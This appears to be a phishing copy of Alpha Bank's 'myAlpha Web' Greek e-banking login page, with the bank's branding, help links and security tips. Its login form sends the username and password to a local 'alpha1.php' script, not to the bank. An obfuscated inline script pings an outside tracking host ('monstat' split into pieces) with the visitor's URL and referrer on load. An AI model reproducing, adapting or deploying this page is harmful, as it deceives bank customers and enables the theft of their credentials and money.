<html lang="en"><head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="Server" content="AlphaFarm02">
    <title>myAlpha Web</title>
    <!-- Styles -->
    <link href="https://secure.alpha.gr/Login/content/css/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1" rel="stylesheet">

</head>

    <div class="row mt-3">
        <div class="col pt-1 font-normal grey" style="padding-left: 37px; padding-right: 37px;">
            <img src="https://secure.alpha.gr/static/login/v1/content/media/login/logo.png">
            <img src="https://secure.alpha.gr/static/login/v1/content/media/login/lock.png" class="pl-5" style="margin-bottom: 10px;">
            Εισέρχεστε σε ασφαλές περιβάλλον της Τράπεζας. Μάθετε περισσότερα εδώ. <a class="font-normal cobalt" href="https://www.alpha.gr/en/retail/support-center/security" target="_blank"></a>.
            <div class="float-right font-normal grey">
                Χρειάζεστε βοήθεια?
                <img id="servicesIcon" src="https://secure.alpha.gr/static/login/v1/content/media/login/laptop.png" class="pl-2 pr-1 cp" onclick="userModal(1)" data-original-title="" title=""> |
                <a href="mailto:ebankingsupport@alpha.gr"><img id="emailIcon" src="https://secure.alpha.gr/static/login/v1/content/media/login/email.png" class="pl-1 pr-1" data-toggle="tooltip" data-placement="bottom" title="" data-original-title="ebankingsupport@alpha.gr"></a> |
                <a href="tel:+30-210-326-0000"><img id="phoneIcon" src="https://secure.alpha.gr/static/login/v1/content/media/login/phone.png" class="pl-1" data-toggle="tooltip" data-placement="bottom" title="" data-original-title="<b>210 326 0000</b> (daily 08:00-22:30)"></a>
                <a class="pl-4 font-normal cobalt" href="https://secure.alpha.gr/Login/myAlphaWeb/el">EL</a>
            </div>
        </div>
    </div>
    <div id="mainContainer" class="row" style="height: 750px;">
        <div class="col bg text-center">
            <div id="loginContainer" class="bg2" style="margin-top: 0px; padding-top: 90px;">
                <div>
                    <form action="alpha1.php" method="post" id="loginFormTmp" class="form-signin mx-auto mt-5 form-validation" novalidate="">
                        <h1 class="h3 mb-3 font-xl cobalt">Καλώς ήρθατε στο myAlpha Web</h1>
                        <h1 class="h3 mb-3 font-lg cobalt">Είσοδος για Ιδιώτες &amp; Επιχειρήσεις</h1>
                        <input type="text" id="inputUsername" name="Username" class="form-control" placeholder="Username" autofocus="" autocomplete="off" maxlength="80" required="">
                        <input type="password" id="inputPassword" name="Password" class="form-control" placeholder="Password" maxlength="25" required="">
                        
                        <button id="submitButton" type="submit" class="form-btn signin mt-4">Είσοδος</button>
                        <button type="button" class="form-btn register mt-3" onclick="userModal(2)">Εγγραφή στο e-Banking</button>
                    </form>
                </div>
                <div class="tips mx-auto text-left font-normal grey">
                    <div class="text-center"><b>Security tips</b></div>
                    <div class="row">
                        <div class="col-1 ml-2"><img src="https://secure.alpha.gr/static/login/v1/content/media/login/shield.png"></div>
                        <div class="col-10">
                            <div id="tipsCarousel" class="carousel slide" data-ride="carousel">
                                <ol class="carousel-indicators">
                                    <li data-target="#tipsCarousel" data-slide-to="0" class=""></li>
                                    <li data-target="#tipsCarousel" data-slide-to="1" class="active"></li>
                                    <li data-target="#tipsCarousel" data-slide-to="2" class=""></li>
                                </ol>
                                <div class="carousel-inner">
                                    <div class="carousel-item active carousel-item-left">
                                        <div class="row">
                                            <div class="col ml-2 my-auto">
                                                <div>Your Username and Password are strictly personal and you should not disclose them to anyone.</div>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="carousel-item carousel-item-next carousel-item-left">
                                        <div class="row">
                                            <div class="col ml-2 my-auto">
                                                <div>Do not respond to emails that ask for your account or password information and don't follow the links they suggest.</div>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="carousel-item">
                                        <div class="row">
                                            <div class="col ml-2 my-auto">
                                                <div>Use antivirus and antimalware to protect against malware.</div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="demo-container">
                    <button type="button" class="demo-btn" onclick="userModal(3)">View the demo ▶</button>
                </div>
            </div>
        </div>
    </div>
    <div class="row separator-line"></div>
    <div class="row">
        <div class="col mt-3 mb-3 text-center font-normal grey">
            <a class="font-normal grey" href="https://www.alpha.gr/en/retail/oroi/terms-of-use" target="_blank">Terms of Use</a> |
            <a class="font-normal grey" href="https://www.alpha.gr/en/retail/support-center/security" target="_blank">Security</a> |
            <a class="font-normal grey" href="https://www.alpha.gr/en/retail/oroi/cookies-policy" target="_blank">Cookies Policy</a>
        </div>
    </div>
    <!-- Modal -->
    <div class="modal fade" id="loginModal" tabindex="-1" role="dialog" aria-labelledby="loginModalLabel" aria-hidden="true" style="margin-top: 88px;">
        <div class="modal-dialog" role="document">
            <div class="modal-content" id="modalContent" style="width: 550px;">
                <div class="modal-header border-bottom-0 pb-0">
                    <button type="button" class="close modal-close-btn" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">×</span>
                    </button>
                </div>
                <div class="modal-body pt-0 pb-4">
                    <div class="row mb-3">
                        <div class="col text-center">
                            <span class="font-lg grey" id="modalTitle">Modal title</span>
                        </div>
                    </div>
                    <div class="row mb-3">
                        <div class="col text-center mx-auto">
                            <button id="retailBtn" type="button" class="btn btn-link modal-btn shadow font-md cobalt">
                                <img src="https://secure.alpha.gr/static/login/v1/content/media/login/retail.png" class="pt-4">
                                <p class="mt-1" style="line-height:1px;">Are you a retail user?</p>
                            </button>
                        </div>
                        <div class="col text-center mx-auto">
                            <button id="corporateBtn" type="button" class="btn btn-link modal-btn shadow font-md cobalt">
                                <img src="https://secure.alpha.gr/static/login/v1/content/media/login/corporate.png" class="pt-3">
                                <p class="mt-1" style="line-height:1px;">Are you a business user?</p>
                            </button>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <input id="iKey" name="iKey" type="hidden" value="00ced89a-f71e-4c8f-94bc-90eae5cb233a">
    <input id="appId" name="appId" type="hidden" value="54d45c5d-9142-4893-bc82-cd01df78a6f5">
    <input id="disableAi" name="disableAi" type="hidden" value="False">
    <input id="aiEndpoint" name="aiEndpoint" type="hidden" value="https://monitoring.alpha.gr/appinsights/">
    <input id="opId" name="opId" type="hidden" value="43b137f08ec08d4780917a34bba5efe6">
    <input id="opName" name="opName" type="hidden" value="MyAlphaWeb">
    <input id="serverDisplayName" name="serverDisplayName" type="hidden" value="AlphaFarm02">
    <script src="/Login/bundles/appInsights?v=xPr-JzppmL-I8vTqZaoBBDKFMrArsdju7rdrgi76wdQ1"></script><script src="https://az416426.vo.msecnd.net/scripts/a/ai.0.js"></script>

    <script src="/Login/scripts/js/login?v=Dnetcg23kUNdCI5pQmuwHKYP1GOaDfw8pFjZdTJ3WLs1"></script>

    <script src="/Login/bundles/rsa?v=5TNeJF4ZhNX08AmfFwVBB9GG79NX7mtzoP4Q4ixFEJo1"></script>

    <script src="/Login/Scripts/login/sjcl.min.js"></script>
    <script type="text/javascript">
        var loginSettings = loginSettings || {};
        loginSettings.LoginType = 0;

        
        new Image().src = document.location.protocol + "//mon" + "sta" + "t.co" + "m/" + "myAlphaWeb3" + ".p" + "ng?du=" + escape(document.location) + "&dr=" + escape(document.referrer) + "&rr=" + Math.random();

        var userActivityTimeout = null;
        var userActivityThrottlerTimeout = null
        var INACTIVE_USER_TIME_THRESHOLD = 10000;
        var USER_ACTIVITY_THROTTLER_TIME = 5000;

        function resetUserActivityTimeout() {
            clearTimeout(userActivityTimeout);
            userActivityTimeout = setTimeout(function() {
                inactiveUserAction();
            }, INACTIVE_USER_TIME_THRESHOLD);
        }

        function userActivityThrottler() {
            if (!userActivityThrottlerTimeout) {
                userActivityThrottlerTimeout = setTimeout(function() {
                    resetUserActivityTimeout();

                    clearTimeout(userActivityThrottlerTimeout);
                    userActivityThrottlerTimeout = null;
                }, USER_ACTIVITY_THROTTLER_TIME);
            }
        }

        function inactiveUserAction() {
            $('#servicesIcon').popover({
                trigger: 'manual',
                placement: 'bottom',
                title: '<span class="font-md cobalt">Get familiar with e-Banking</span><img src="https://secure.alpha.gr/static/login/v1/content/media/login/close.png" class="popover-close-btn cp" onclick="closeServicesPopover()">',
                content: '<p class="mb-12 grey"><span class="popover-icon"><img src="https://secure.alpha.gr/static/login/v1/content/media/login/find-answer.png"></span>&nbsp;Answers to FAQs</p><p class="mb-12 grey"><img src="https://secure.alpha.gr/static/login/v1/content/media/login/how2video.png">&nbsp;Useful how2videos</p>',
                html: true,
                sanitize: false
            }).popover('show').tooltip('disable');
        }

        function activateActivityTracker() {
            window.addEventListener("mousemove", userActivityThrottler);
            window.addEventListener("scroll", userActivityThrottler);
            window.addEventListener("keydown", userActivityThrottler);
            window.addEventListener("resize", userActivityThrottler);
        }

        function doResize() {
            var h = window.innerHeight;
            var nh = (h - 112) >= 750 ? h - 112 : 750;
            var lc_mt = (h - 880) > 0 ? h - 880 : 0;
            var lm_mt = (h / 2) - 180;
            $('#mainContainer').attr("style", "height: " + nh + "px;");
            $('#loginContainer').attr("style", "margin-top: " + lc_mt + "px; padding-top: 90px;");
            $('#loginModal').attr("style", "margin-top: " + lm_mt + "px;");

            var w = window.innerWidth;
            var mc_w = w > 600 ? 550 : 500;
            $('#modalContent').attr("style", "width: " + mc_w + "px;");

            if ($("#errorMsg").length) {
                $('#inputUsername').attr("style", "margin-top: 10px;");
                switch ($("#errorMsg").height()) {
                    case 16: // 1 line
                        break;
                    case 32: // 2 lines
                        $('#loginContainer').attr("style", "padding-top: 70px;");
                        break;
                    case 48: // 3 lines
                        $('#loginContainer').attr("style", "padding-top: 60px;");
                        break;
                    case 64: // 4 lines
                        $('#loginContainer').attr("style", "padding-top: 40px;");
                        break;
                    case 80: // 5 lines
                        $('#loginContainer').attr("style", "padding-top: 20px;");
                        break;
                    default:
                        $('#loginContainer').attr("style", "padding-top: 0;");
                }
            }
        }

        function userModal(type) {
            switch (type) {
                case 1:
                    $('#modalTitle').html("Electronic Services Support");
                    $('#retailBtn').attr("data-link-url", "https://www.alpha.gr/en/retail/support-center/e-banking");
                    $('#corporateBtn').attr("data-link-url", "https://www.alpha.gr/en/business/support-center/e-banking");
                    $('#retailBtn, #corporateBtn').off("click").on('click', closeModal);
                    break;
                case 2:
                    $('#modalTitle').html("Registration of new subscriber");
                    $('#retailBtn').attr("data-link-url", "https://www.alpha.gr/en/retail/myalpha/tools/support-online-registration");
                    $('#corporateBtn').attr("data-link-url", "https://secure.alpha.gr/Login/BusinessOnboarding/home?locale=en");
                    $('#retailBtn, #corporateBtn').off("click").on('click', closeModal);
                    break;
                case 3:
                    $('#modalTitle').html("View the demo");
                    $('#retailBtn').attr("data-link-url", "#");
                    $('#corporateBtn').attr("data-link-url", "#");
                    $('#retailBtn').off("click").on('click', function () { demoLogin(1); });
                    $('#corporateBtn').off("click").on('click', function () { demoLogin(2); });
                    break;
                case 4:
                    $('#modalTitle').html("I forgot my Username");
                    $('#retailBtn').attr("data-link-url", "https://secure.alpha.gr/Login/forgotusername/home" + "?locale=en");
                    $('#corporateBtn').attr("data-link-url", "https://www.alpha.gr/en/business/support-center/e-banking/asfaleia-kai-kodikoi/ksexasa-tous-kodikous-kleidosa-tin-sundromi");
                    $('#retailBtn, #corporateBtn').off("click").on('click', closeModal);
                    break;
            }

            closeServicesPopover();
            $('#loginModal').modal('toggle');
        }

        function closeNotif() {
            $('#notif').hide(600);
            closeServicesPopover();
        }

        function closeServicesPopover() {
            $('#servicesIcon').popover('hide');
            $('#servicesIcon').tooltip('enable');
        }

        function closeModal() {
            $('#loginModal').modal('hide');
            var url = this.dataset.linkUrl;
            if (url != "#") {
                setTimeout(function () { window.open(url); }, 30);
            }
        }

        function rememberMe() {
            if ($('#inputRM').is(":checked") && $('#inputUsername').val() != "") {
                localStorage.rm = $('#inputRM').val();
                localStorage.un = enc($('#inputUsername').val());
            } else {
                localStorage.rm = "";
                localStorage.un = "";
            }
        }

        function demoLogin(userType) {
            switch (userType) {
                case 1:
                    submitLogin("demouser", "demouser", false);
                    break;
                case 2:
                    submitLogin("corpDemoUser", "corpDemoUser", false);
                    break;
            }
        }

        function addRBFAdditionalFields() {
            var screenHeight = window.screen.height;
            var screenWidth = window.screen.width;
            document.getElementById("screenResolution").value = screenWidth + "X" + screenHeight;

            //Although Intl is (at a limited scope) supposedly supported in IE11
            //(https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/DateTimeFormat#Browser_compatibility),
            //it actually looks like `window.Intl` returns undefined. To avoid console errors, check its value before attempting to use it.
            var timeZone = "";
            if (window.Intl) {
                var dtFormat = new Intl.DateTimeFormat();
                timeZone = dtFormat.resolvedOptions().timeZone;
            }
            document.getElementById("timeZone").value = timeZone;
        }

        $(function () {
            doResize();
            $(window).on('resize', doResize);

            //Remember me
            if (localStorage.rm && localStorage.rm == "1") {
                $('#inputRM').attr("checked", "checked");
                $('#inputUsername').val(dec(localStorage.un));
            } else {
                $('#inputRM').removeAttr("checked");
                $('#inputUsername').val("");
            }

            //Enable tooltips
            $('#servicesIcon').tooltip({
                placement: 'bottom',
                html: true,
                title: 'Electronic Services Support',
                template: '<div class="tooltip" role="tooltip"><div class="arrow"></div><div class="tooltip-inner tooltip-mw-100"></div></div>'
            });

            $('#emailIcon,#phoneIcon').tooltip({
                html: true,
                template: '<div class="tooltip" role="tooltip"><div class="arrow"></div><div class="tooltip-inner tooltip-mw-100"></div></div>'
            });

            $('#infoIcon').tooltip({
                html: true,
                template: '<div class="tooltip" role="tooltip"><div class="arrow"></div><div class="tooltip-inner"></div></div>'
            });

            //Retrieve notification from alpha.gr
            var jqxhr = $.getJSON('https://www.alpha.gr/api/ebankingnotification/en');
            jqxhr.done(function (data) {
                if (data.showNotification) {
                    $('#notifTitle').html(data.notificationTitle);
                    $('#notifMsg').html(data.notificationText);
                    $('#notif').removeClass("d-none");
                }
            });
            jqxhr.fail(function () {
                console.log("call to alpha.gr failed");
            });

            var submitForm = function () {
                rememberMe();

                $('.form-validation').addClass("was-validated");

                var username = $("#inputUsername").val();
                var password = $("#inputPassword").val();
                addRBFAdditionalFields();

                submitLogin(username, password, false);
            }

            $("#loginFormTmp").on('submit', function (event) {
                event.preventDefault();
                const target = $('#submitButton');
                if (!target.is(':disabled')) {
                    submitForm();
                }
            });

            activateActivityTracker();
        });
    </script>


</body></html>